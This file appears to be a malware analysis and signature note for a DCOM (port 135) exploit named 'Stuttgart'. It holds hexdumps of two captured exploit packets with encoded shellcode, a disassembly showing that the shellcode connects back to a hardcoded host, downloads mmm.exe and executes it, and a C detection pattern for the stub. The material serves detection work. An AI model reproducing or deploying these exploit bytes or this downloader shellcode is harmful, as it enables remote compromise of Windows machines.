(DCOM)
Port: 135
Codename: Stuttgart
Reference: cdac1b24863204a32a63dc6222870933.bin
/*
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................|
00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............|
00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.|
00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................|
00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....|
00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................|
00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........|
00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................|
000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................|
00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.............A..|
00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |...A^.t1........|
00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |....y.)..)..)...|
000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)...............|
000003b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 |.........J......|
000003c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe |.....t...6b;kh..|
000003d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 |....T.u...'[.f>.|
000003e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 |..!.q.b..."....(|
000003f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 |......)Z..)..)..|
00000400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 |..u.)...u.y.).8.|
00000410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 |U.k..jcc..&b.T).|
00000420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 |......F%..)...u.|
00000430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 |)..)...u).(.e.+.|
00000440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 |..].......!a..].|
00000450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 |.!f.'b.<...B(f..|
00000460 5d f7 be f2 f2 ca f6 0f d6 49 ca a0 a2 88 37 29 |]........I....7)|
00000470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d |^.....]..)z....]|
00000480 f7 86 27 62 d7 fb 65 e7 a2 a1 a2 a2 a2 f2 c8 a6 |..'b..e.........|
00000490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 |..]..)Ve........|
000004a0 da c7 a2 ca d8 d8 d8 8c 29 5e f7 f5 5d f7 ae 2b |........)^..]..+|
000004b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 |...........]..'b|
000004c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 |....]......]..!f|
000004d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 |.I}]..].....]...|
000004e0 5d f7 92 5d f7 a6 62 62 62 62 62 62 62 62 62 62 |]..]..bbbbbbbbbb|
000004f0 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
*
000005d0 62 62 8b 45 30 05 24 fb ff ff ff e0 eb f4 62 62 |bb.E0.$.......bb|
000005e0 0b 0b 1b 00 62 62 62 62 62 62 62 62 62 62 62 62 |....bbbbbbbbbbbb|
000005f0 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
*
00000610 62 62 62 62 62 62 62 62 eb 06 62 62 59 1c 00 01 |bbbbbbbb..bbY...|
00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 62 62 62 62 62 |.D$........bbbbb|
00000630 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
00000640 62 62 62 62 62 62 62 62 62 62 62 62 62 62 5c 00 |bbbbbbbbbbbbbb\.|
00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............|
00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......|
00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000680 01 00 00 00 01 00 00 00 07 00 |..........|
0000068a
*//*
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................|
00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............|
00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.|
00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................|
00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....|
00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................|
00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........|
00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................|
000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................|
00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.............A..|
00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |...A^.t1........|
00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |....y.)..)..)...|
000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)...............|
000003b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 |.........J......|
000003c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe |.....t...6b;kh..|
000003d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 |....T.u...'[.f>.|
000003e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 |..!.q.b..."....(|
000003f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 |......)Z..)..)..|
00000400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 |..u.)...u.y.).8.|
00000410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 |U.k..jcc..&b.T).|
00000420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 |......F%..)...u.|
00000430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 |)..)...u).(.e.+.|
00000440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 |..].......!a..].|
00000450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 |.!f.'b.<...B(f..|
00000460 5d f7 be f2 f2 ca f6 0f 94 0b ca a0 a2 6d 59 29 |]............mY)|
00000470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d |^.....]..)z....]|
00000480 f7 86 27 62 d7 fb 65 e7 a2 a4 a2 a2 a2 f2 c8 a6 |..'b..e.........|
00000490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 |..]..)Ve........|
000004a0 da c7 a2 ca cf cf cf 8c 29 5e f7 f5 5d f7 ae 2b |........)^..]..+|
000004b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 |...........]..'b|
000004c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 |....]......]..!f|
000004d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 |.I}]..].....]...|
000004e0 5d f7 92 5d f7 a6 76 76 76 76 76 76 76 76 76 76 |]..]..vvvvvvvvvv|
000004f0 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
*
000005d0 76 76 8b 45 30 05 24 fb ff ff ff e0 eb f4 76 76 |vv.E0.$.......vv|
000005e0 0b 0b 1b 00 76 76 76 76 76 76 76 76 76 76 76 76 |....vvvvvvvvvvvv|
000005f0 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
*
00000610 76 76 76 76 76 76 76 76 eb 06 76 76 59 1c 00 01 |vvvvvvvv..vvY...|
00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 76 76 76 76 76 |.D$........vvvvv|
00000630 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
00000640 76 76 76 76 76 76 76 76 76 76 76 76 76 76 5c 00 |vvvvvvvvvvvvvv\.|
00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............|
00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......|
00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000680 01 00 00 00 01 00 00 00 07 00 |..........|
0000068a
*/
00402007 eb 15 jmp short stuttgar.0040201e 00402009 b9 8be61341 mov ecx,4113e68b 0040200e 81f1 d8e71341 xor ecx,4113e7d8 00402014 5e pop esi 00402015 807431 ff a2 xor byte ptr ds:[ecx+esi-1],0a2 0040201a ^e2 f9 loopd short stuttgar.00402015 0040201c eb 05 jmp short stuttgar.00402023 0040201e e8 e6ffffff call stuttgar.00402009 00402023 33db xor ebx,ebx 00402025 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 00402029 8b40 0c mov eax,dword ptr ds:[eax+c] 0040202c 8b70 1c mov esi,dword ptr ds:[eax+1c] 0040202f ad lods dword ptr ds:[esi] 00402030 8b40 08 mov eax,dword ptr ds:[eax+8] 00402033 53 push ebx 00402034 53 push ebx 00402035 68 33320000 push 3233 0040203a 68 7773325f push 5f327377 0040203f 68 72740000 push 7472 00402044 68 6d737663 push 6376736d 00402049 e8 34000000 call stuttgar.00402082 0040204e d0b6 0378e275 sal byte ptr ds:[esi+75e27803],1 ; --------- no code below 00402054 e7 77 out 77,eax ; i/o command 00402056 54 push esp 00402057 a2 e777c21b mov byte ptr ds:[1bc277e7],al 0040205c 0278 9c add bh,byte ptr ds:[eax-64] 0040205f 40 inc eax 00402060 0278 b8 add bh,byte ptr ds:[eax-48] 00402063 0e push cs 00402064 0178 54 add dword ptr ds:[eax+54],edi 00402067 8c01 mov word ptr ds:[ecx],es 00402069 78 15 js short stuttgar.00402080 0040206b 3e:fa cli ; superfluous prefix 0040206d ^74 f4 je short stuttgar.00402063 0040206f 1e push ds 00402070 fa cli 00402071 74 53 je short stuttgar.004020c6 00402073 c4fa les edi,edx ; illegal use of register 00402075 ^74 ae je short stuttgar.00402025 00402077 a1 fa740fc1 mov eax,dword ptr ds:[c10f74fa] 0040207c fa cli 0040207d ^74 b6 je short stuttgar.00402035 0040207f 13fa adc edi,edx 00402081 74 5d je short stuttgar.004020e0 00402083 6a 02 push 2 00402085 5b pop ebx 00402086 8bf8 mov edi,eax 00402088 53 push ebx 00402089 53 push ebx 0040208a 8b57 3c mov edx,dword ptr ds:[edi+3c] 0040208d 8b543a 78 mov edx,dword ptr ds:[edx+edi+78] 00402091 03d7 add edx,edi 00402093 52 push edx 00402094 8b52 20 mov edx,dword ptr ds:[edx+20] 00402097 
03d7 add edx,edi 00402099 33db xor ebx,ebx 0040209b 43 inc ebx 0040209c 8b349a mov esi,dword ptr ds:[edx+ebx*4] 0040209f 03f7 add esi,edi 004020a1 33c9 xor ecx,ecx 004020a3 ac lods byte ptr ds:[esi] 004020a4 32c8 xor cl,al 004020a6 c1c1 05 rol ecx,5 004020a9 ac lods byte ptr ds:[esi] 004020aa 84c0 test al,al 004020ac ^75 f6 jnz short stuttgar.004020a4 004020ae 8b75 00 mov esi,dword ptr ss:[ebp] 004020b1 2b4cb5 00 sub ecx,dword ptr ss:[ebp+esi*4] 004020b5 ^75 e4 jnz short stuttgar.0040209b 004020b7 873424 xchg dword ptr ss:[esp],esi 004020ba 8b56 24 mov edx,dword ptr ds:[esi+24] 004020bd 03d7 add edx,edi 004020bf 66:8b0c5a mov cx,word ptr ds:[edx+ebx*2] 004020c3 8b56 1c mov edx,dword ptr ds:[esi+1c] 004020c6 03d7 add edx,edi 004020c8 8b048a mov eax,dword ptr ds:[edx+ecx*4] 004020cb 03c7 add eax,edi 004020cd 5e pop esi 004020ce 8944b5 00 mov dword ptr ss:[ebp+esi*4],eax 004020d2 ff45 00 inc dword ptr ss:[ebp] 004020d5 5b pop ebx 004020d6 4b dec ebx 004020d7 ^75 b0 jnz short stuttgar.00402089 004020d9 5b pop ebx 004020da 83c3 02 add ebx,2 004020dd 54 push esp 004020de ff55 08 call dword ptr ss:[ebp+8] 004020e1 83c4 08 add esp,8 004020e4 85c0 test eax,eax 004020e6 ^75 9e jnz short stuttgar.00402086 004020e8 b4 02 mov ah,2 004020ea 2be0 sub esp,eax 004020ec 8ac4 mov al,ah 004020ee 54 push esp 004020ef 50 push eax 004020f0 ff55 1c call dword ptr ss:[ebp+1c] ; wsastartup 004020f3 50 push eax 004020f4 50 push eax 004020f5 68 54a654c2 push c254a654 ; ip 004020fa 68 0200c50d push 0dc50002 ; port 004020ff 8bfc mov edi,esp 00402101 50 push eax 00402102 6a 01 push 1 00402104 6a 02 push 2 00402106 ff55 20 call dword ptr ss:[ebp+20] ; socket 00402109 8bd8 mov ebx,eax 0040210b 6a 10 push 10 0040210d 57 push edi 0040210e 53 push ebx 0040210f ff55 24 call dword ptr ss:[ebp+24] ; connect 00402112 85c0 test eax,eax 00402114 75 59 jnz short stuttgar.0040216f 00402116 c745 00 03000000 mov dword ptr ss:[ebp],3 0040211d 50 push eax 0040211e 6a 04 push 4 00402120 55 push ebp 00402121 53 
push ebx 00402122 ff55 2c call dword ptr ss:[ebp+2c] ; send 00402125 8bf4 mov esi,esp 00402127 c745 00 77620000 mov dword ptr ss:[ebp],6277 0040212e 68 65786500 push 657865 00402133 68 6d6d6d2e push 2e6d6d6d 00402138 8bfc mov edi,esp 0040213a 55 push ebp 0040213b 57 push edi 0040213c ff55 0c call dword ptr ss:[ebp+c] ; fopen // mmm.exe 0040213f 8945 00 mov dword ptr ss:[ebp],eax 00402142 6a 00 push 0 00402144 68 00020000 push 200 00402149 56 push esi 0040214a 53 push ebx 0040214b ff55 28 call dword ptr ss:[ebp+28] ; recv 0040214e 85c0 test eax,eax 00402150 74 11 je short stuttgar.00402163 00402152 78 1b js short stuttgar.0040216f 00402154 ff75 00 push dword ptr ss:[ebp] 00402157 50 push eax 00402158 6a 01 push 1 0040215a 56 push esi 0040215b ff55 10 call dword ptr ss:[ebp+10] ; fwrite 0040215e 83c4 10 add esp,10 00402161 ^eb df jmp short stuttgar.00402142 00402163 ff75 00 push dword ptr ss:[ebp] 00402166 ff55 14 call dword ptr ss:[ebp+14] ; fclose 00402169 50 push eax 0040216a 54 push esp 0040216b 57 push edi 0040216c ff55 18 call dword ptr ss:[ebp+18] ; _execv 0040216f 53 push ebx ; error/end 00402170 ff55 30 call dword ptr ss:[ebp+30] 00402173 ff55 04 call dword ptr ss:[ebp+4]
/*
 * Detection pattern for the decoded "Stuttgart" connect-back stub, i.e. the
 * instruction run 004020f3..00402122 in the listing above (push/push/push ip/
 * push port ... socket ... connect ... send).
 *
 * The backslashes are doubled, so the string holds the *text* "\x50" rather
 * than the byte 0x50: this is a textual pattern, presumably consumed by a
 * regex-style matcher in which "(....)" / "(..)" are wildcard groups of that
 * many characters -- TODO confirm against the consumer.  The three groups
 * cover the operands that vary from sample to sample: the listener IP, the low
 * two bytes of the sockaddr push (port) and the immediate stored to [ebp]
 * before send.  Decoded with the stub's XOR key 0xa2, the two captures above
 * differ in exactly those bytes, plus the dropped file's name and the padding
 * byte, both of which lie outside this pattern.
 *
 * Note for signature deployment: the pattern matches the stub *after* the
 * 0xa2 decoder loop has run; on the wire (see the hexdumps) the same bytes
 * are still encoded, so apply it to decoded/in-memory data, not raw packets.
 *
 * One literal per instruction below; adjacent literals concatenate to the
 * same string as before.
 */
const char *stuttgart =
    "\\x50"                   /* 004020f3  push eax                          */
    "\\x50"                   /* 004020f4  push eax                          */
    "\\x68(....)"             /* 004020f5  push <ip>            (wildcard)   */
    "\\x68\\x02\\x00(..)"     /* 004020fa  push 0dc50002 ; port (low 2 bytes wildcarded) */
    "\\x8B\\xFC"              /* 004020ff  mov edi,esp                       */
    "\\x50"                   /* 00402101  push eax                          */
    "\\x6A\\x01"              /* 00402102  push 1                            */
    "\\x6A\\x02"              /* 00402104  push 2                            */
    "\\xFF\\x55\\x20"         /* 00402106  call [ebp+20] ; socket            */
    "\\x8B\\xD8"              /* 00402109  mov ebx,eax                       */
    "\\x6A\\x10"              /* 0040210b  push 10                           */
    "\\x57"                   /* 0040210d  push edi                          */
    "\\x53"                   /* 0040210e  push ebx                          */
    "\\xFF\\x55\\x24"         /* 0040210f  call [ebp+24] ; connect           */
    "\\x85\\xC0"              /* 00402112  test eax,eax                      */
    "\\x75\\x59"              /* 00402114  jnz  0040216f (error/end)         */
    "\\xC7\\x45\\x00(....)"   /* 00402116  mov [ebp],<imm32>    (wildcard)   */
    "\\x50"                   /* 0040211d  push eax                          */
    "\\x6A\\x04"              /* 0040211e  push 4                            */
    "\\x55"                   /* 00402120  push ebp                          */
    "\\x53"                   /* 00402121  push ebx                          */
    "\\xFF\\x55\\x2C";        /* 00402122  call [ebp+2c] ; send              */